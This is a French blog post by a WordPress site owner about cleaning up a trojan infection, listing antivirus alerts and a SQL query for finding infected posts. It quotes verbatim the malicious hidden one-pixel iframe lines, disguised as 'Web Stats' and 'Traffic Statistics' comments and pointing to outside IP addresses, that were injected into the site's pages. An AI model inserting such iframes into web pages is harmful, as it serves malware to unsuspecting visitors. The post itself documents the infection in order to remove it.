Cheval de Troie
J’ai un site qui a été infecté par ce couple d’emmerdement juste avant le WE du premier Mai.
Le symptôme :
Les anti-virus de vos visiteurs vont se mettre à clignoter avec des messages citant ces 2 coupables :
- Cheval de troie JS:Packed-T [trj]
- Programme malveillant ‘HTML/Iframe-inf’
Il me semble que ces 2 problèmes ont une seule solution.
J’ai trouvé ceci dans le code source de la page infestée :
<!-- Web Stats --> <iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!-- End Web Stats -->
D’après Field Marshall il s’agit simplement d’une ligne de texte qui s’est introduite à la fin des fichiers index.php. Field Marshall indique des méthodes basées sur des scripts à lancer sur une console pour chasser et éradiquer le problème.
De mon coté, cela me rappelle quelque chose et j’ai déjà été victime d’un troyen. C’était wp-stat et ça ressemble beaucoup à JS:Packed. Je vous recommande la lecture de cet article d’ailleurs.
J’ai commencé par éradiquer la chaine contenant le terme « iframe » avec une recherche dans les sources des derniers articles publiés.
Pour vérifier dans la base de données, on peut se loguer avec PhpMyAdmin et lancer la requête suivante :
SELECT * FROM wp_posts WHERE post_content like '%IFRAME%' ;
Attention, maintenant que WordPress archive les articles, vous pouvez encore trouver des trace de la ligne dans des version archivées des articles nettoyés (post-type = revision).
Parmis les articles incriminées j’ai trouvé ce code :
<!-- Traffic Statistics --> <iframe src="http://61.132.75.71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->
Et aussi celui là :
<!-- Web Stats --> <iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!-- End Web Stats -->
Pour ce soir, je vais en rester là. J’imagine que ce sont des postes de rédacteurs qui sont infestés et qui ont permis l’intrusion de ces codes.
Tags : erreur, probleme, securite
Jeu de briques
Snake
Pacman
Bubble